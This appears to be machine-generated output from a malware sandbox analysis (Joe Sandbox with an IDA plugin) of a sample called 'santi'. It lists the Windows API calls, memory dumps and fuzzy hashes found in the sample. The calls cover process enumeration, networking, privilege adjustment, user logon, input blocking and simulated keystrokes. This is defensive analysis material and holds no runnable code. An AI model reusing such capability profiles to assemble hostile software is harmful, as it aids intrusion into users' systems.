                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                • String ID:
                                                                • API String ID: 1279440585-0
                                                                • Opcode ID: 5c3a8fa34f0650211d0234fbdf3071de09a12fb9b53599c53578378c9affe1d7
                                                                • Instruction ID: caee94a37e23f552c30e70d1d0a9f9f65b0b68e86c14ede645507426a4875ee0
                                                                • Opcode Fuzzy Hash: 5c3a8fa34f0650211d0234fbdf3071de09a12fb9b53599c53578378c9affe1d7
                                                                • Instruction Fuzzy Hash: 9B21E531700600AFCB12EF68DD85B6EB7A9EF49710F118159F956AB3D2CB70AD41CB61
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00326554
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00326564
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00326583
                                                                • __wsplitpath.LIBCMT ref: 003265A7
                                                                • _wcscat.LIBCMT ref: 003265BA
                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003265F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                • String ID:
                                                                • API String ID: 1605983538-0
                                                                • Opcode ID: aa90b0cd7bc95e23898b0e7ccc1625f6b383c9616ddc2d87303b7058e49e78ad
                                                                • Instruction ID: 36711726624c849d54787ec1e2a31d0e898e116d94e42e8264fc0bb84bf5dfbd
                                                                • Opcode Fuzzy Hash: aa90b0cd7bc95e23898b0e7ccc1625f6b383c9616ddc2d87303b7058e49e78ad
                                                                • Instruction Fuzzy Hash: 0E218771900219ABDB12ABA4DC89FEEB7BCAF4A300F6044A5F505E7141DBB59F85CB60
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003213DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: ($,29$<29$|
                                                                • API String ID: 1659193697-2929170881
                                                                • Opcode ID: c7a9bfa7b916a5ca5c729fd53beafed28555ae640281d2faa2ba613019fa568a
                                                                • Instruction ID: 9691a39b3ff7d37c2699d506c460c355bb62416886486b80910a25756d52286e
                                                                • Opcode Fuzzy Hash: c7a9bfa7b916a5ca5c729fd53beafed28555ae640281d2faa2ba613019fa568a
                                                                • Instruction Fuzzy Hash: 3C322475A006159FCB29DF29D58096AF7F0FF58320B12C46EE59ADB3A1E770E981CB40
                                                                APIs
                                                                  • Part of subcall function 0033A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00339296
                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003392B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 4170576061-0
                                                                • Opcode ID: a0aa48f11ca8d4f9b83f63e200cbd6fcc419d2931a6a03a4bc485e72e20a90fa
                                                                • Instruction ID: c892286fcfefd1ed550e78930279e2cb0072d5e298dc7c37ea5b3c57d897883e
                                                                • Opcode Fuzzy Hash: a0aa48f11ca8d4f9b83f63e200cbd6fcc419d2931a6a03a4bc485e72e20a90fa
                                                                • Instruction Fuzzy Hash: 6341F270600204EFDB11AF28C882E7EB7EDEF44764F05845DFA56AB3C2CAB49D118B91
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0032EB8A
                                                                • _wcscmp.LIBCMT ref: 0032EBBA
                                                                • _wcscmp.LIBCMT ref: 0032EBCF
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0032EBE0
                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0032EC0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 2387731787-0
                                                                • Opcode ID: 986c7bef5725172dd069d254b3995e8df6d61960f05b6702e4bde1517518f8cd
                                                                • Instruction ID: beec7fa1a7c5b3bf8666f8bc8fcea9da40a287c684035840f39d51ffb4ce6515
                                                                • Opcode Fuzzy Hash: 986c7bef5725172dd069d254b3995e8df6d61960f05b6702e4bde1517518f8cd
                                                                • Instruction Fuzzy Hash: 3041C035604311CFC719DF68D491AAAB3E8FF49320F10456EEA5A8B3A1DB71A944CF51
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                • String ID:
                                                                • API String ID: 292994002-0
                                                                • Opcode ID: ca77cce723d872cc0a939479e1e93a6c2ffaf4eb188afa786f41ec6b17642b31
                                                                • Instruction ID: 952a8baa873e6d0a104776dab9207215d7b05c67aed7c2b0a37018b68d6402e8
                                                                • Opcode Fuzzy Hash: ca77cce723d872cc0a939479e1e93a6c2ffaf4eb188afa786f41ec6b17642b31
                                                                • Instruction Fuzzy Hash: 3011B231700110ABE7236F26DC44E6FBBDCEF45760F06442AF94ADB281CF70A9028AA5
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002FE014,771B0AE0,002FDEF1,0037DC38,?,?), ref: 002FE02C
                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002FE03E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                • API String ID: 2574300362-192647395
                                                                • Opcode ID: e5c197d88ac59905d5321688a9bd16446a1968f6ff1114f416ecd8eb145dbcb3
                                                                • Instruction ID: 3175868f65567fe83fb8723c2a813ecd1f3a3f3ac6511786eb33e6169c757f37
                                                                • Opcode Fuzzy Hash: e5c197d88ac59905d5321688a9bd16446a1968f6ff1114f416ecd8eb145dbcb3
                                                                • Instruction Fuzzy Hash: 67D0A730D11B13EFCF334F61ED48663B6D8AF01300F19842DE482E2160DBF4C8808650
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: @$ :$ :$ :
                                                                • API String ID: 3728558374-311032763
                                                                • Opcode ID: 1ed7b7bd974097c0c7377823c70c206050006374277b7d93ef7e20c409eaeb98
                                                                • Instruction ID: aa0e6ad0206532a2b2840d042df5fa5319c1481156bd8e142957ae0b6cce319d
                                                                • Opcode Fuzzy Hash: 1ed7b7bd974097c0c7377823c70c206050006374277b7d93ef7e20c409eaeb98
                                                                • Instruction Fuzzy Hash: E972BC30E142099FCB15EF94C481EBEF7B5EF48380F15806AEE09AB291D770AE55CB91
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 002FB22F
                                                                  • Part of subcall function 002FB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 002FB5A5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Proc$LongWindow
                                                                • String ID:
                                                                • API String ID: 2749884682-0
                                                                • Opcode ID: 3c398d43da8edd3678b0ec7ed13f59f038240a0fbfcb18d2be2e71c9bf8c4b04
                                                                • Instruction ID: 7d9672d638da6fbfbef28f28c7200fdf66935b49e0a91e86860eb7b3030c0820
                                                                • Opcode Fuzzy Hash: 3c398d43da8edd3678b0ec7ed13f59f038240a0fbfcb18d2be2e71c9bf8c4b04
                                                                • Instruction Fuzzy Hash: 0FA147A013400DFADB2F6E2ACC88D7FA95CEB463C5F154139FE02DA5A2DB559D209272
                                                                APIs
                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003343BF,00000000), ref: 00334FA6
                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00334FD2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                • String ID:
                                                                • API String ID: 599397726-0
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID: \Q9
                                                                • API String ID: 4104443479-1715661531
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032E20D
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0032E267
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0032E2B4
                                                                Similarity
                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1682464887-0
                                                                APIs
                                                                  • Part of subcall function 002FF4EA: std::exception::exception.LIBCMT ref: 002FF51E
                                                                  • Part of subcall function 002FF4EA: __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0031B180
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0031B1AD
                                                                • GetLastError.KERNEL32 ref: 0031B1BA
                                                                Similarity
                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 1922334811-0
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00326623
                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00326664
                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0032666F
                                                                Similarity
                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                • String ID:
                                                                • API String ID: 33631002-0
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00327223
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0032723A
                                                                • FreeSid.ADVAPI32(?), ref: 0032724A
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0032F599
                                                                • FindClose.KERNEL32(00000000), ref: 0032F5C9
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0033BE6A,?,?,00000000,?), ref: 0032CEA7
                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0033BE6A,?,?,00000000,?), ref: 0032CEB9
                                                                Similarity
                                                                • API ID: ErrorFormatLastMessage
                                                                • String ID:
                                                                • API String ID: 3479602957-0
                                                                APIs
                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00324153
                                                                • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00324166
                                                                Similarity
                                                                • API ID: InputSendkeybd_event
                                                                • String ID:
                                                                • API String ID: 3536248340-0
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0031ACC0), ref: 0031AB99
                                                                • CloseHandle.KERNEL32(?,?,0031ACC0), ref: 0031ABAB
                                                                Similarity
                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                • String ID:
                                                                • API String ID: 81990902-0
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00306DB3,-0000031A,?,?,00000001), ref: 003081B1
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003081BA
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                Strings
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: :
                                                                • API String ID: 3964851224-3082381708
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: __itow__swprintf
• String ID:
• API String ID: 674341424-0
• Opcode ID: e4c1d50e02fa82779b0097288b386885a1e200cf68763ffff2a475ec1cc1cf48
• Instruction ID: 4d3c4d9ad4dbc657d9ee0a35801d3374ed9bde97fb7013c5cff4f3c3df2de559
• Opcode Fuzzy Hash: e4c1d50e02fa82779b0097288b386885a1e200cf68763ffff2a475ec1cc1cf48
• Instruction Fuzzy Hash: A422DB715683419FC725DF15C880B6FB7E4AF84304F50492EF99A8B2A1DB71E998CF82
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a01980bdc38334666b32b67a4a7ea3679454af01986563cbab9491de9bd49798
• Instruction ID: 41cc76eea6655ba778c0995e17743d9ef35f8b9e6842ba6310b1354a5c25f79e
• Opcode Fuzzy Hash: a01980bdc38334666b32b67a4a7ea3679454af01986563cbab9491de9bd49798
• Instruction Fuzzy Hash: D7B1CD20D2AF414DD22796398871336B69CAFBB3D5F92D71BFC2A74D62EB6185C34180
APIs
• __time64.LIBCMT ref: 0032B6DF
  • Part of subcall function 0030344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0032BDC3,00000000,?,?,?,?,0032BF70,00000000,?), ref: 00303453
  • Part of subcall function 0030344A: __aulldiv.LIBCMT ref: 00303473
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: 5ece6bec82cef1dac53050d775f5f8293ed478375c5ddae7a1397ef45336b8a2
• Instruction ID: 0ff3ce38e0a022df3ade6dbfd5db40fc654592fd91b137fbbbbe56506ae30618
• Opcode Fuzzy Hash: 5ece6bec82cef1dac53050d775f5f8293ed478375c5ddae7a1397ef45336b8a2
• Instruction Fuzzy Hash: D4217F766345108BCB2ACF28D891A92F7E5EB95310B248E6DE4E5CF2C0CB74BA05DB54
APIs
• BlockInput.USER32(00000001), ref: 00336ACA
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 7d4b209833f4e3545a1c05b06f28245902dd02169699c223b632f4c8a57ba7bb
• Instruction ID: 37d009adf9c7f4ca43fd0d658e57ed773ba074d8adddbc918213f4461bc2680d
• Opcode Fuzzy Hash: 7d4b209833f4e3545a1c05b06f28245902dd02169699c223b632f4c8a57ba7bb
• Instruction Fuzzy Hash: 37E01A76250204AFC700EBA9D84599AB7ECAFA9751F05C426EA45D7291DAB0E8048BA0
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003274DE
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 9d15817618ebf44589c5597a3d82c2a8764b4b7d010ea4add366baac27beffa9
• Instruction ID: 80108932f48961f4c15d47ff78028379b8f02091a31fd544c93a71cf8bcfba5d
• Opcode Fuzzy Hash: 9d15817618ebf44589c5597a3d82c2a8764b4b7d010ea4add366baac27beffa9
• Instruction Fuzzy Hash: 2CD05EB062C32538EC2F2726BC0FF76090CF3007C0FC28189B582C98C1B8C068019032
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0031AD3E), ref: 0031B124
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 02a18d3d04d5a237b0900f40138d3036c869aea397f71436fe96319bb8fbf859
• Instruction ID: 4b559e7d9da7bc72cb8b68d2f64d67319fa2c814c1bb5d4a49917cb2638729b1
• Opcode Fuzzy Hash: 02a18d3d04d5a237b0900f40138d3036c869aea397f71436fe96319bb8fbf859
• Instruction Fuzzy Hash: 93D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D531AB50
APIs
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: eaee927f5e46c5043e7763f8d88c32a43e62ee080eba6e2630574e68e76a0ce5
• Instruction ID: 4c73906108749e76fba66f0a6ffb4048ed8093dc98a8ef0c8f5bd188c3b4c490
• Opcode Fuzzy Hash: eaee927f5e46c5043e7763f8d88c32a43e62ee080eba6e2630574e68e76a0ce5
• Instruction Fuzzy Hash: F9C04CB1800509DFC752CBC0CD44DEEB7BCAB04701F104191D105F1110D7709B459B72
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0030818F
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 616311dc7f1cdb2ad8925979daf333e1ae52b82b7e5448255b79305c06a21f61
• Instruction ID: 4a21335621fbc4527232c2b8209542e6e73d52c1ebf0394acdec2f633fa1763a
• Opcode Fuzzy Hash: 616311dc7f1cdb2ad8925979daf333e1ae52b82b7e5448255b79305c06a21f61
• Instruction Fuzzy Hash: 0BA0113000020CAB8F022B82EC088883F2CEA002A0B208020F80C002208BA2A8208A82
